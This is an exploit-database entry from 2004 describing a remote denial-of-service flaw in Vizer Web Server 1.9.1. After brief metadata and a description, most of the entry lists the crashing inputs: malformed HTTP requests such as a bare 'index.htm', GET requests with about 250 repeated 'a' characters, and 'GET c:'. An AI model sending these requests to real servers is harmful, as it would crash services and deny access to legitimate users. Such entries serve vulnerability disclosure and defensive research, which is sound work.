Vizer Web Server 1.9.1 - Remote Denial of Service

2004-02-17T00:00:00
ID EXPLOITPACK:2658CD0778A6ED8F9B9CB5883B7CE261
Type exploitpack
Reporter Donato Ferrante
Modified 2004-02-17T00:00:00

Description

Vizer Web Server 1.9.1 - Remote Denial of Service

                                        
                                            source: https://www.securityfocus.com/bid/9678/info

It has been reported that Vizer Web Server may be prone to a remote denial of service vulnerability that may allow an attacker to cause the affected server to crash, denying service to legitimate users.

Vizer Web Server 1.9.1 has been reported to be affected by this issue.

index.htm
( without specifying GET and HTTP )

or:

GET /aaaaaa[ 250 of a ]aaa HTTP/1.1
( specifying GET and HTTP )

GET /aaaaaa[ 250 of a ]aaa
( specifying only GET )

or:

GET c:( specifying only GET )